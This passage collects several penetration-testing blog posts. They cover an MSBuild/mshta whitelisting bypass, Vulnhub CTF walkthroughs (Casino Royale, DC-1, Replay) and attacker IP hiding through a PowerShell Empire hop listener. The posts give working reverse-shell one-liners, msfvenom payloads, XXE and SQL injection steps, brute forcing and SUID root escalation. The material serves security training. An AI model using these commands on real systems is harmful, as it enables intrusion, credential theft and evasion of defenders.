Following this, we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case, it is Kali Linux. After that, we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as a msbuild_nps.xml file. Also, we are told to start a listener.

We will start the listener before anything else. To do this we have to be inside the nps_payload folder. Now the author has provided us with a script that will create a listener for us. So, we will run it as shown below.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.xml. Now to use the msbuild to execute this XML file, we will have to shift this payload file inside this path:

C:\Windows\Microsoft.NET\Framework\v4.0.30319

Once we got the nps_payload.xml file inside the depicted path. Now we need a command prompt terminal (cmd) at that particular path. After we have a cmd at this path we will execute the nps_payload command as shown below.

MSBuild.exe msbuild_nps.xml

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes out the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Getting session using MSBuild HTA

Let’s get another session using the HTA file. To do this we will generate an HTA file. First, we will launch the tool using the command below.

./nps_payload.py

After launching the tool, we are going to choose the HTA payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

Following this, we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case, it is Kali Linux. After that, we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as msbuild_nps.hta file. Also, we are told to start a listener.

We will start the listener as we did earlier.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.hta. Right click on it and choose to Save the Link As. This will download the payload.

Once we got the nps_payload.hta file. Now we need a command prompt terminal (cmd) at that path where we saved the payload file. In our case is the Downloads Folder of the current user. After we have a cmd at this path we will execute the nps_payload command as shown below.

mshta.exe msbuild_nps.hta

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post nps_payload: An Application Whitelisting Bypass Tool appeared first on Hacking Articles.

Casino Royale: 1 Vulnhub Walkthrough

Today we are going to solve another CTF challenge “Casino Royale: 1”. It is a vulnerable lab presented by author creosote for helping pentesters to perform online penetration testing according to your experience level. The challenge is to get root on the Targeted Virtual Machine and read the flag.sh within that directory.

Difficulty: Intermediate

Penetrating Methodologies

  • IP discovery and Port Scanning.
  • Browsing the IP on port 8080.
  • Discovering accessible directories on the victim’s machine.
  • Searching exploits via searchsploit.
  • Using SQLMAP to find database and login credentials.
  • Browsing directories on the browser.
  • Adding Domain name to /etc/hosts file.
  • Searching exploits via searchsploit.
  • Using Cross-Site Request Forgery Exploit code.
  • Using telnet to connect to port 25.
  • Tail off the access.log file.
  • Browsing directories on a browser.
  • Exploiting XML External Entity vulnerability.
  • Using curl to send the file.
  • Creating a PHP shell using msfvenom.
  • Using hydra to brute force FTP login Password.
  • Logging into Ftp.
  • Using Multi/handler of Metasploit Framework.
  • Enumerating through directories.
  • Getting Login Credentials.
  • Looking for SUID file and directories.
  • Creating a bash shell using msfvenom.
  • Using Netcat listener to get a reverse shell.
  • Getting Root Access.
  • Reading the Flag.

Walkthrough

Let’s start off with discovering the IP address of our Target Machine.

netdiscover

Then we’ll continue with our nmap command to find out the open ports and services.

nmap -sV -p- 192.168.1.102

Since port 80 is open, we explored the Targets IP Address on the browser.

We didn’t found anything on the webpage, so we used dirb tool to enumerate the directories on the Targets IP Address.

dirb http://192.168.1.102/

Here, we found a useful directory index.php. Moving on.

We tried opening that directory index.php along with Targets IP Address in the browser. This page seems pretty interesting and gave us our next clue to proceed.

The page revealed a pokermax software term. This made us curious to look for it in searchsploit. And our intuition was right. We copied the exploits 6766.txt file on our machine and read it contents. It revealed a link which we tried opening in the browser.

searchsploit poker
searchsploit -m 6766
cat 6766.txt

That link we opened directed us to Pokermax Poker League: Admin Login. Since we don’t any credentials time to bring up SQLMAP.

Let’s first find the database.

sqlmap -u http://192.168.1.102/pokeradmin/index.php --forms --risk 3 --level 5 --dbs --batch

The database we found is pokerleague.

Let’s look for the credentials of Admin Login in the database pokerleague.

sqlmap -u http://192.168.1.102/pokeradmin/index.php --forms --risk 3 --level 5 -D pokerleague --dump-all --batch

We have got the required credentials.

Username: admin

Password: raise12million

We have successfully logged into the Admin area. Looking for other clues.

After checking all the tabs on the page, we found some useful information in Edit info of player Valenka.

We have got a useful directory in player profile; let’s find out where it’s going to lead us. Also, it asked us to update Domain Name casino-royale.local in our hosts file.

Updating the hosts file.

After opening the directory along with domain name in the browser, we found something interesting about port 25 which was open. This information might come in handy.

Looking around we found a CMS Snowfox. Let’s find if it is on searchsploit.

We were right about it. There is an html file available about this exploit. So we copied the file to our machine.

searchsploit snowfox
searchsploit -m 35301

On reading the contents of the file, we found a script for CROSS SITE REQUEST FORGERY (add admin). So we copied this code.

Created a new file as raj.html and pasted the code in it, also we made some minor changes as you can see in the image.

After that, we have copied the file raj.html to /var/www/html folder of our machine. And restarted the service for apache2.

Let’s connect to port 25 using telnet. We will be sending a mail to recipient valenka along with the link of raj.html file. All the steps are shown in the image.

telnet casino-royale.local 25

We have just tail off the access log of apache2.

tail -n1 -f /var/log/apache2/access.log

Let’s Login with the credentials, we have given in the raj.html file in the Signin section of the page casino-royale.local/vip-client-portfolios/?uri=signin

Email address: user@user.local

Password: password

After successfully logging in, we found another clue in Edit of le@casino-royale.local in manage players.

Another directory clue let’s open it in the browser and look what it holds.

We landed on this page.

Since that page doesn’t seem useful from outside. So, we checked its Page Source. This gave us a hint to use an XML External Entity injection for our next step.

So we looked for a code for XML External Entity injection online. Therefore, we created a new file xml.txt and pasted the code by making some minor changes.

https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

Let’s send our XML External Entity Injection in file xml.txt using curl.

curl -d @xml.txt http://casino-royale.local/ultra-access-view/main.php

After exploiting the XML External Entity vulnerability, it gave us the /etc/passwd file. This contained a username for FTP Login i.e ftpUserULTRA

We have created a PHP shell payload using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.107 lport=443 -f raw > shell.php5

We have used hydra to find the password of username ftpUserULTRA for Ftp Login. We have cracked the password for ftp login i.e bankbank

hydra -l ftpUserULTRA -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.102

Let’s just Login into FTP, after quiet messing up we are only able to send .php5 files or files with no extension.  Time to upload our shell and gave permissions to execute.

ftp 192.168.1.102 21
put shell.php5
chmod 777 shell.php5

After uploading our shell, we set up a listener using Metasploit-framework.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

shell
python -c "import pty; pty.spawn('/bin/bash')"

After enumerating through directories, we found a useful file config.php. Let’s check it contents.

We when we read the contents of config.php. It gave us two useful credentials.

DBusername: valenka

DBpassword: 11archives11!

So, we used these credentials to login into Valenka.

su valenka
password: 11archives11!

After that, we tried to find files with SUID bit permissions.

find / -perm -4000 2>/dev/null

Here we found an interesting Suid file and directory.

/opt/casino-royale/mi6_detect_test

On running the SUID file, we see it is most likely using a run.sh file but there no such file or directory. Since the run.sh has no permissions.  So we decided to move to /tmp directory.

/opt/casino-royale/mi6_detect_test
cd /opt/casino-royale/
ls
cd /tmp

We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.107 lport=1234 R

After that, we have copied the code in run.sh and executed python server.

nano run.sh
python -m SimpleHTTPServer

We have downloaded the file in the /tmp directory. Again ran the SUID file.

wget http://192.168.1.107:8000/run.sh
/opt/casino-royale/mi6_detect_test

This time on running the SUID file, it gave a reverse shell on our netcat listener.  Finally, we have got the root access and read the FLAG!!

nc -lvp 1234
id
cd/root
ls
cd flag
cat flag.sh

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post Casino Royale: 1 Vulnhub Walkthrough appeared first on Hacking Articles.

DC-1: Vulnhub Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTPS service port (80)
  • Finding Drupal CMS
  • Exploiting Drupalgeddon2 to get a reverse shell
  • Finding files with SUID bit set
  • Finding the “find” command with SUID bit set
  • Getting root shell with “find” command
  • Getting final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.104

Our next step is to scan our target with nmap.

nmap -sV 192.168.1.104

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)

We find that port 80 is running http, so we open the IP in our browser.

When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and successfully able to get a reverse shell.

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.

python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null

As “find” command has SUID bit set, we can execute the command as “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.  

After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell as root user. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.

touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post DC-1: Vulnhub Walkthrough appeared first on Hacking Articles.

Hiding IP During Pentest using PowerShell Empire (http_hop)

This is our fourth article in empire series, in this article we learn to use hop payload in PowerShell empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic to one of our another active listener after getting an agent. Thus, the name hop as it hops the agent from one listener to another in order to redirect traffic.

Similar to Metasploit, the hop listener in empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said files in your jump server (ubuntu) and then set up your stager in according to get the session through the mediator i.e. our hop listener.

In the following image, you can see our Kali’s IP. Now, we will try and take windows session via ubuntu using http_hop payload, in order to hide our own IP, i.e. basically, our http_hop payload will help us (attacker) to hide from the getting caught.

Here, in the following image, you can see our ubuntu’s IP too.

Now, let’s get started. First, we should have a simple http listener, for that type :

uselistener http
execute

Now, start the http_hop listener by typing :

uselistener http_hop
set RedirectListener http
set Host http://192.168.1.111

Here, we have given RedirectListener i.e. all the traffic from http listener will be directed to the http_hop listener.

Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of your Ubuntu as shown in the image below :

Now, you can see in the image below we have activated two listeners :

Let’s start our stager by typing the following commands :

usestager windows/launcher_bat
set Listener http_hop
execute

Once our bat file is executed in the target PC, we will have our session. Now, if you observe the IP through which we have obtained the session is of Ubuntu and not of windows but we have the access of a Windows PC, similarly, in windows, it will show that the attacking machine is Ubuntu and not kali. Hence our http_hop is effective.

In conclusion, the major advantage of the http_hop listener is that it helps an attacker from being identified as on the target PC, as the said listener hides the original IP.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hiding IP During Pentest using PowerShell Empire (http_hop) appeared first on Hacking Articles.

Replay: 1: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “Replay: 1”. The credit for making this VM machine goes to “c0rruptedb1t” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Penetrating Methodology:

  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTPS service port (80)
  • Enumerating password from Source code.
  • Enumerating robots.txt and finding the zip file
  • Unzipping zip file
  • Enumerating password from the binary file
  • Enumerating the hardcoded command
  • Editing the hardcoded command
  • Getting a reverse shell
  • Enumerating password for the user
  • Elevate Privileges to get root
  • Getting Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.37

Our next step is to scan our target with nmap.

nmap -p- -A 192.168.1.37

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 1337(Unknown)

We find that port 80 is running http, so we open the IP in our browser.

We take a look at the source code of web page and at the top of the source code, we find a string inside a comment. We are not able to do anything with it, so we save it for later.

Nmap scan shows us that there is one entry inside robots.txt. We open robots.txt and find an entry called “/bob_db.zip”.

We open the link and download the zip file from the web server. After downloading the file, we extract it and find 64-bit ELF file and a text file. We take a look at the content of the text file and don’t find anything of use.

When we run the application “client.bin”, it asks for an IP address and a password.

As we have no clue for the password, we check the strings inside the application and there we find a hint for the password. Inside the application, we find the second half of the password. Now earlier inside the web page, we found a strange string that might be the first half of the password.

Password: qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

We joined the string and use it as a password for the application. After giving the password, we successfully able to login, and find that we can run commands. But when we type a command we get an error stating that we are sending unauthorized packets and the connection gets closed.

Now when we take a closer look at the application we find that the command “;whoami” is hardcoded in the application.

We try to edit the application and change “;whoami” command to something else and find that the size of string inside the application should remain the same and the command should always start with a semi-colon. So we changed the “;whoami” to “;uname -a” keeping the number of characters inside the application the same by replacing existing characters inside the application.

Now when we run the application and give the password we are successfully able to execute our command.

Now we replace the entire string with our netcat reverse shell one-liner and used extra characters to keep the size of the application the same.

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

Now we run the application and give the correct the password.

We setup our listener and are successfully able to get a reverse shell. After getting a reverse shell we spawn a TTY shell using python.

nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'

Enumerating through the directories inside “~/Documents/.ftp” we find a file called “users.passwd”. We open it and find the password for user “bob”. Now we check the sudoers list and find that we can run all commands as root user.

sudo -l

As we have the password for user bob, we spawn a shell as the root user. We go to “/” directory and find a file called “flag.txt”. We take a look at the content of the file and find the congratulatory flag.

sudo -i 
cd /
cat flag.txt

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post Replay: 1: Vulnhub Lab Walkthrough appeared first on Hacking Articles.